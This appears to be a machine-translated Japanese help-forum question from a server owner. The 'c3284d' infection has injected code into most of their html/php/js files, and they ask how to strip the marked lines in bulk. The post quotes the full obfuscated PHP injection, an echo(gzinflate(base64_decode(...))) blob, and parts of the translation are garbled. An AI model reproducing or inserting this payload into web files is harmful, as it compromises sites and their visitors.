Notorious c3284d ウィルスに問題があります。見つけることができるほとんどすべての html/php/js ファイルを変更します。
サーバー上のすべてのパスワードとユーザーを変更したので、侵害されたアカウントであれば問題は解決したはずですが、完全に削除するのにまだ苦労しています。
sudo grep -R "#c3284d#" /home
簡単なコマンドを使用して、すべての感染ファイルを見つけることができました。
しかし、検索して置き換える簡単な方法が必要です。
ウイルス署名は次の行です。
"#c3284d#" echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw=="))); "#/c3284d#"
エコー行が変化したり変化したりする可能性がありますが、常に で始まり で#c32..#
終わり#/c3....#
ます。
何もないものに置き換えたいだけです。